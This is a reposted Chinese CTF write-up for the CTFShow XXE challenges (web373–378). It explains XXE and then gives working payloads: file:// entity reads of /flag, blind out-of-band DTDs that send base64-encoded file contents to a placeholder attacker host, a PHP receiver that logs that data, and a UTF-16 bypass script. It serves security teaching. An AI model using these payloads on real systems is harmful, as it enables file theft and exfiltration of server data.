XML

XML即 可擴展標記語言（EXtensible Markup Language），是一種標記語言，其標簽沒有預定義，您需要自行定義標簽，是W3C的推薦標準。其于HTML的區別是：

• HTML 被設計用來顯示數據
• XML 被設計用來傳輸和存儲數據

XML文檔結構包括：

• XML聲明
• DTD文檔類型定義（可選）
• 文檔元素

XML是一種非常流行的標記語言，在1990年代后期首次標準化，并被無數的軟件項目所采用。它用于配置文件，文檔格式（如OOXML，ODF，PDF，RSS，...），圖像格式（SVG，EXIF標題）和網絡協議（WebDAV，CalDAV，XMLRPC，SOAP，XMPP，SAML， XACML，...），他應用的如此的普遍以至于他出現的任何問題都會帶來災難性的結果。

在解析外部實體的過程中，XML解析器可以根據URL中指定的方案（協議）來查詢各種網絡協議和服務（DNS，FTP，HTTP，SMB等）。 外部實體對于在文檔中創建動態引用非常有用，這樣對引用資源所做的任何更改都會在文檔中自動更新。 但是，在處理外部實體時，可以針對應用程序啟動許多攻擊。 這些攻擊包括泄露本地系統文件，這些文件可能包含密碼和私人用戶數據等敏感數據，或利用各種方案的網絡訪問功能來操縱內部應用程序。 通過將這些攻擊與其他實現缺陷相結合，這些攻擊的范圍可以擴展到客戶端內存損壞，任意代碼執行，甚至服務中斷，具體取決于這些攻擊的上下文。

XXE漏洞主要針對web服務危險的引用的外部實體并且未對外部實體進行敏感字符的過濾，從而可以造成命令執行，目錄遍歷等。

對于傳統的XXE來說，要求攻擊者只有在服務器有回顯或者報錯的基礎上才能使用XXE漏洞來讀取服務器端文件，如果沒有回顯則可以使用Blind XXE漏洞來構建一條帶外信道提取數據。

xxe漏洞存在是因為XML解析器解析了用戶發送的不可信數據。然而，要去校驗DTD(document type definition)中SYSTEM標識符定義的數據，并不容易，也不大可能。大部分的XML解析器默認對于XXE攻擊是脆弱的。因此，最好的解決辦法就是配置XML處理器去使用本地靜態的DTD，不允許XML中含有任何自己聲明的DTD。通過設置相應的屬性值為false，XML外部實體攻擊就能夠被阻止。因此，可將外部實體、參數實體和內聯DTD 都被設置為false，從而避免基于XXE漏洞的攻擊。

web373

題目給出源碼，一個有回顯的文件讀取漏洞

<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds = simplexml_import_dom($dom);$ctfshow = $creds->ctfshow;echo $ctfshow; } highlight_file(__FILE__); ?>

抓包發送如下內容

<?xml version="1.0"?> <!DOCTYPE xml [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <H3rmesk1t><ctfshow>&xxe;</ctfshow> </H3rmesk1t>

得到flag?

web374

無回顯的文件讀取，需要進行外帶

<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); } highlight_file(__FILE__); ?>

抓包發送如下內容

<!DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx:xxxx/xxe.xml"> %remote; %send; ]>

在服務器放置xxe.php?和?xxe.xml?兩個文件

<?php $content = $_GET['1']; if(isset($content)){file_put_contents('flag.txt','更新時間:'.date("Y-m-d H:i:s")."\n".$content); }else{echo 'no data input'; } <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'" > %all;

web375

無回顯的文件讀取，且禁用了版本號，和上面一樣進行外帶不寫版本號即可

<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){die('error'); } if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); } highlight_file(__FILE__); ?>

抓包發送如下內容

<!DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx:xxxx/xxe.xml"> %remote; %send; ]>

在服務器放置xxe.php?和?xxe.xml?兩個文件

<?php $content = $_GET['1']; if(isset($content)){file_put_contents('flag.txt','更新時間:'.date("Y-m-d H:i:s")."\n".$content); }else{echo 'no data input'; } <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'" > %all;

web376

無回顯的文件讀取，且禁用了版本號，和上面一樣進行外帶不寫版本號即可

<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){die('error'); } if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); } highlight_file(__FILE__); ?>

抓包發送如下內容

<!DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx:xxxx/xxe.xml"> %remote; %send; ]>

在服務器放置xxe.php?和?xxe.xml?兩個文件

<?php $content = $_GET['1']; if(isset($content)){file_put_contents('flag.txt','更新時間:'.date("Y-m-d H:i:s")."\n".$content); }else{echo 'no data input'; } <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'" > %all;

web377

payload

import requestsurl = 'http://ddca1082-2f62-4f7f-b8b1-e369e33aa168.chall.ctf.show/' payload = """<!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % aaa SYSTEM "http://xxx/test.dtd"> %aaa; ]> <root>123</root>""" payload = payload.encode('utf-16') requests.post(url ,data=payload)

開監聽拿flag

web378

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <user><username>&xxe;</username><password>&xxe;</password></user>

總結

以上是生活随笔為你收集整理的CTFSHOW-web入门-XXE的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。